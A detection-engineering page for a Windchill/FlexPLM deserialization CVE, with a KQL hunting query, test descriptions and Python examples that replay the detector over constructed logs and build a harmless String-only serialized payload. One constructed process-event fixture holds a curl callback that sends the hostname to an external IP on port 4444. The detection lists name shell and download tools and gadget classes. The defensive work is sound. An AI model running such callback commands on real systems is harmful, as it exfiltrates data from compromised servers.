CVE-2026-12569 - PTC Windchill and FlexPLM Improper Input Validation / Unsafe Deserialization
Detects exploitation attempts targeting CVE-2026-12569, an improper input validation and unsafe deserialization vulnerability (CWE-20, CWE-502) in PTC Windchill and FlexPLM. This vulnerability is listed in CISA KEV, indicating active exploitation in the wild. Attackers may leverage this to achieve remote code execution via crafted serialized objects or malformed input submitted to Windchill/FlexPLM HTTP endpoints.
Vulnerability Intelligence
KEV: Known Exploited
Affected Software
- Vendor: PTC
- Product: Windchill and FlexPLM
Timeline
- Disclosed: June 25, 2026
References & Proof of Concept (vendor advisory, CISA directive and NVD record; no proof-of-concept code is linked)
- https://www.ptc.com/en/support/article/CS473270
- https://www.cisa.gov/news-events/directives/bod-26-04-prioritizing-security-updates-based-risk
- https://www.cisa.gov/news-events/directives/bod-26-04-implementation-guidance-prioritizing-security-updates-based-risk
- https://nvd.nist.gov/vuln/detail/CVE-2026-12569
What is CVE-2026-12569 (PTC Windchill and FlexPLM Improper Input Validation / Unsafe Deserialization)?
CVE-2026-12569 maps to the MITRE ATT&CK tactics Initial Access, Execution and Lateral Movement: the adversary is trying to get into your network through the public-facing PLM application, run code on the server, and pivot from it.
This page provides production-ready detection logic for CVE-2026-12569 - PTC Windchill and FlexPLM Improper Input Validation / Unsafe Deserialization, covering the data sources and telemetry it touches: DeviceNetworkEvents, DeviceProcessEvents, CommonSecurityLog, AzureActivity. The queries below are rated critical severity at medium confidence, and ship for 7 SIEM platforms — KQL, SPL, Elastic, QRadar, Sumo, YARA-L, LogScale.
MITRE ATT&CK
- Tactics: Initial Access, Execution, Lateral Movement
Detection Query (KQL)
union DeviceNetworkEvents, DeviceProcessEvents, CommonSecurityLog
| where TimeGenerated > ago(7d)
// Normalise the differently named columns so one filter covers all three tables.
| extend Host = coalesce(DeviceName, Computer),
         Url = coalesce(RequestURL, RemoteUrl),
         DstPort = coalesce(DestinationPort, RemotePort)
// Scope: PTC hosts, PTC URL paths, or a Java serialization stream header in the URL
// (raw 0xACED0005, percent-encoded %AC%ED, base64 "rO0AB", hex "aced0005").
| where Host contains "windchill" or Host contains "flexplm"
    or Url has_any ("/Windchill/", "/FlexPLM/", "/ptc/", "/servlet/", "/wt.httpgw")
    or (DstPort in (80, 443, 8080, 8443)
        and (Url contains "java.io.ObjectInputStream" or Url contains "rO0AB"
             or Url contains "aced0005" or Url contains "%AC%ED"))
// Signal: shell/download utility spawned by the Java application server, gadget class
// names or serialized-object markers in the request, or an explicit exploit alert.
| where (InitiatingProcessFileName in~ ("java.exe", "javaw.exe", "java")
         and FileName in~ ("cmd.exe", "powershell.exe", "pwsh.exe", "bash", "sh", "wget", "curl", "certutil.exe"))
    or Url contains "java.lang.Runtime" or Url contains "ProcessBuilder"
    or Url contains "rO0AB" or Url contains "aced0005"
    or Activity has "Exploit"
    or AdditionalExtensions has_any ("CVE-2026-12569", "deserialization", "ObjectInputStream")
| project TimeGenerated, Host, FileName, InitiatingProcessFileName, InitiatingProcessCommandLine, ProcessCommandLine, Url, SourceIP, DestinationIP, RemoteIP, DstPort, Activity, AdditionalExtensions
| order by TimeGenerated desc
Detects suspicious activity against PTC Windchill and FlexPLM servers: Java serialized-object markers (raw magic bytes 0xACED0005, percent-encoded %AC%ED, base64 rO0AB or hex aced0005) in HTTP requests to PTC endpoints, and post-exploitation shells or download utilities spawned by the Java application-server process. Three details matter in practice. The parent/child check is on InitiatingProcessFileName and FileName, so java.exe spawning cmd.exe is caught while an administrator's cmd.exe launching tools is not. Hostnames are matched with contains rather than has, because has matches whole terms and would miss a device named windchill01. The hex marker must be the full aced0005; the bare substring aced appears in ordinary words such as replaced and will flood the rule with false positives.
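The query above, re-implemented as an added Python example (not part of the page's detection package) so that both halves of the logic, the HTTP-side serialized-object markers and the Java-parent process spawn, can be exercised offline. All records, hostnames, IPs and paths are constructed for illustration, and the sample payload is a syntactically valid Java stream carrying only a String, with no gadget classes.

```python
"""Added example: the page's KQL detection logic over constructed log records.
Hosts, IPs, paths and the sample payload below are constructed, not captured."""
import base64
from typing import Optional, Union
from urllib.parse import unquote_to_bytes

JAVA_MAGIC = b"\xac\xed\x00\x05"            # STREAM_MAGIC 0xACED + STREAM_VERSION 5
JAVA_MAGIC_B64 = base64.b64encode(JAVA_MAGIC)[:5].decode()  # "rO0AB": fixed prefix of any stream
JAVA_MAGIC_HEX = JAVA_MAGIC.hex()                           # "aced0005"; bare "aced" also matches "replaced"

PTC_PATHS = ("/windchill/", "/flexplm/", "/ptc/", "/servlet/", "/wt.httpgw")
GADGET_HINTS = ("java.lang.Runtime", "ProcessBuilder", "java.io.ObjectInputStream")
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "bash", "sh", "wget", "curl", "certutil.exe"}
JAVA_PARENTS = {"java.exe", "javaw.exe", "java"}


def serialized_java_indicator(data: Union[str, bytes]) -> Optional[str]:
    """Return 'raw' (also covers percent-encoded %AC%ED%00%05), 'base64' or 'hex'
    when the Java stream header is present in a URL or body, else None."""
    text = data.decode("latin-1") if isinstance(data, bytes) else data
    raw = unquote_to_bytes(text.encode("latin-1", "replace"))
    if JAVA_MAGIC in raw:
        return "raw"
    if JAVA_MAGIC_B64 in text:
        return "base64"
    if JAVA_MAGIC_HEX in text.lower():
        return "hex"
    return None


def is_ptc_host(host: str) -> bool:
    # Substring match on purpose: "windchill01" is a single term, so a whole-term
    # match (KQL `has`) would miss it.
    return "windchill" in host.lower() or "flexplm" in host.lower()


def check_http(rec: dict) -> Optional[str]:
    """Label an HTTP record against a PTC host/path that carries a serialized-object
    or gadget-class indicator; None otherwise."""
    url, body = rec["url"], rec.get("body", "")
    if not (is_ptc_host(rec["host"]) or any(p in url.lower() for p in PTC_PATHS)):
        return None
    for field, value in (("url", url), ("body", body)):
        enc = serialized_java_indicator(value)
        if enc:
            return f"java-serialized-{enc}-in-{field}"
    if any(h in url or h in body for h in GADGET_HINTS):
        return "gadget-class-name"
    return None


def check_process(ev: dict) -> Optional[str]:
    """Shell or download utility spawned by the Java application server on a PTC host."""
    if not is_ptc_host(ev["host"]):
        return None
    if ev["parent"].lower() in JAVA_PARENTS and ev["file"].lower() in SHELLS:
        return f"{ev['parent']}->{ev['file']}"
    return None


def run_detection(http_records, process_events):
    """Findings as (timestamp, host, detail, label), newest first."""
    findings = []
    for r in http_records:
        label = check_http(r)
        if label:
            findings.append((r["ts"], r["host"], r["src"], label))
    for e in process_events:
        label = check_process(e)
        if label:
            findings.append((e["ts"], e["host"], e["cmdline"], label))
    return sorted(findings, reverse=True)


SIM_BODY = JAVA_MAGIC + b"\x74\x00\x03foo"   # TC_STRING "foo": valid stream, no gadgets

# Constructed proxy/WAF records (fields loosely follow CommonSecurityLog).
PROXY_RECORDS = [
    {"ts": "2026-06-26T09:12:01Z", "src": "203.0.113.7", "host": "windchill01.corp.example",
     "url": "/Windchill/servlet/WindchillAuthenticator", "body": base64.b64encode(SIM_BODY).decode()},
    {"ts": "2026-06-26T09:15:30Z", "src": "10.0.0.5", "host": "windchill01.corp.example",
     "url": "/Windchill/app/", "body": ""},                            # normal admin use
    {"ts": "2026-06-26T09:20:45Z", "src": "198.51.100.9", "host": "flexplm.corp.example",
     "url": "/FlexPLM/servlet/x?o=%AC%ED%00%05AAAA", "body": ""},      # percent-encoded header
    {"ts": "2026-06-26T09:22:10Z", "src": "10.0.0.8", "host": "windchill01.corp.example",
     "url": "/Windchill/app/replaced.html", "body": ""},                # "aced" substring only
    {"ts": "2026-06-26T09:25:00Z", "src": "203.0.113.7", "host": "windchill01.corp.example",
     "url": "/servlet/x", "body": SIM_BODY.hex()},                      # hex-logged body
]

# Constructed EDR process events (fields loosely follow DeviceProcessEvents).
PROCESS_EVENTS = [
    {"ts": "2026-06-26T09:12:03Z", "host": "windchill01", "parent": "java.exe",
     "file": "cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"ts": "2026-06-26T08:00:00Z", "host": "windchill01", "parent": "explorer.exe",
     "file": "cmd.exe", "cmdline": "cmd.exe"},                         # admin shell, not flagged
    {"ts": "2026-06-26T09:20:50Z", "host": "flexplm01", "parent": "java",
     "file": "curl", "cmdline": "curl http://203.0.113.7:4444/?h=$(hostname)"},
    {"ts": "2026-06-26T09:21:00Z", "host": "build01", "parent": "java.exe",
     "file": "cmd.exe", "cmdline": "cmd.exe /c gradlew.bat build"},    # out-of-scope host
]

if __name__ == "__main__":
    for finding in run_detection(PROXY_RECORDS, PROCESS_EVENTS):
        print(*finding, sep=" | ")
```

Running the block prints five findings and none for the admin GET, the replaced.html request or the java-spawned shell on the build server; the last of those shows why the host/path scoping matters, since Java parents spawning cmd.exe are routine on CI hosts.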
Data Sources
Required Tables
- DeviceNetworkEvents
- DeviceProcessEvents
- CommonSecurityLog
- AzureActivity (listed for this detection; not referenced by the KQL query above)
False Positives
- Legitimate administrative access to Windchill or FlexPLM via standard HTTP endpoints
- Internal vulnerability scanners running against PTC product endpoints
- Authorized penetration testing or red team exercises targeting the PLM environment
- Java RMI or legitimate serialized session data transmitted over normal application workflows
Sigma rule & cross-platform mapping
The detection logic for CVE-2026-12569 (PTC Windchill and FlexPLM Improper Input Validation / Unsafe Deserialization) above is provided in a vendor-neutral form so you can deploy it on any SIEM. The same logic is shipped here as native KQL (Microsoft Sentinel / Defender), SPL (Splunk), Elastic Security EQL, IBM QRadar AQL, Sumo Logic CSE, YARA-L (Google Chronicle / SecOps) and CrowdStrike LogScale CQL queries. In Sigma terms, this detection targets the following logsource:
logsource:
  category: process_creation
  product: windows
This logsource covers only the post-exploitation half of the detection (a shell or download utility spawned by java.exe on a Windows host). The HTTP-side indicators, serialized-object markers in requests to Windchill/FlexPLM endpoints, need a separate rule on a proxy, WAF or web-server logsource, and Windchill servers running on Linux need a second process_creation rule with product: linux.
Testing Methodology
Validate this detection against 3 Atomic Red Team-style adversary techniques. Each test below lists the behaviour to exercise and the telemetry you should expect to see.
- Test 1: CVE-2026-12569 - Simulated Java Deserialization Payload HTTP Request to Windchill Endpoint
  Expected signal: Proxy or WAF logs should capture the POST request to /Windchill/servlet/WindchillAuthenticator with a raw body that begins with the Java serialization magic bytes (aced0005 in hex, rO0AB if the product base64-encodes bodies). A network capture (Wireshark/tcpdump) will show the octets 0xAC 0xED 0x00 0x05 at the start of the request body in the TCP stream; over TLS they are visible only at a decrypting proxy or on the server side.
- Test 2: CVE-2026-12569 - Simulate Post-Exploitation Shell Spawn from Java Parent (Windows)
  Expected signal: Windows Security Event ID 4688 (Process Creation) showing cmd.exe with creator process java.exe (the command line is recorded only if command-line auditing is enabled). CrowdStrike ProcessRollup2 event with ParentBaseFileName=java.exe and FileName=cmd.exe, or the equivalent Defender DeviceProcessEvents row with InitiatingProcessFileName=java.exe and FileName=cmd.exe.
- Test 3: CVE-2026-12569 - Simulate Post-Exploitation Outbound C2 from Windchill Server (Linux)
  Expected signal: Network connection logs (Elastic/Zeek/firewall) showing an outbound TCP connection from the Windchill server to an external IP on port 4444. Process ancestry in EDR showing bash/curl invoked from the java process with suspicious URL parameters (hostname, whoami output).
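A safe stand-in for Test 1, added here as an example and not taken from the page's test package: it builds a syntactically valid Java serialization stream that carries only a String (no gadget classes, so nothing executes even on an unpatched server), wraps it in the POST the test describes, and locates the octets a packet capture should show. The hostname, the Content-Type header (the conventional type for serialized Java objects; what the vulnerable endpoint actually expects is not documented on this page) and the assumption that the body is sent unmodified are all mine.

```python
"""Added example: a benign Java serialization stream and the POST wrapper for Test 1.
Host, path and content type are assumptions for a lab, not values from the advisory."""
import base64

STREAM_MAGIC = b"\xac\xed"      # java.io.ObjectStreamConstants.STREAM_MAGIC
STREAM_VERSION = b"\x00\x05"    # STREAM_VERSION = 5
TC_STRING = b"\x74"             # type code for a short java.lang.String


def java_serialized_string(value: str) -> bytes:
    """Serialize one Java String as ObjectOutputStream.writeObject would:
    header, TC_STRING, 2-byte big-endian length, modified-UTF-8 bytes (ASCII
    input keeps modified UTF-8 identical to UTF-8)."""
    data = value.encode("utf-8")
    if len(data) > 0xFFFF:
        raise ValueError("strings over 65535 bytes use TC_LONGSTRING; not needed here")
    return STREAM_MAGIC + STREAM_VERSION + TC_STRING + len(data).to_bytes(2, "big") + data


def build_post(host: str, path: str, body: bytes) -> bytes:
    """Raw HTTP/1.1 POST carrying the stream as the request body."""
    head = (f"POST {path} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            "Content-Type: application/x-java-serialized-object\r\n"   # assumed
            f"Content-Length: {len(body)}\r\n"
            "Connection: close\r\n\r\n")
    return head.encode("ascii") + body


def magic_offset(tcp_stream: bytes) -> int:
    """Offset of 0xAC 0xED 0x00 0x05 in a captured (cleartext) stream, or -1."""
    return tcp_stream.find(STREAM_MAGIC + STREAM_VERSION)


def log_forms(body: bytes) -> dict:
    """The same body as it appears in products that base64- or hex-encode raw bodies."""
    return {"base64": base64.b64encode(body).decode(), "hex": body.hex()}


if __name__ == "__main__":
    body = java_serialized_string("cve-2026-12569-detection-test")
    request = build_post("windchill01.corp.example",            # constructed host
                         "/Windchill/servlet/WindchillAuthenticator", body)
    print(request)
    print("magic at offset", magic_offset(request), log_forms(body))
```

To run the test against a lab instance, write body to a file and send it with curl --data-binary @body.bin and the same Content-Type header; then check that the proxy/WAF record carries aced0005 (hex) or rO0AB (base64) depending on how that product encodes bodies, and that the 4688/EDR side stays quiet, since a bare String deserializes without spawning anything.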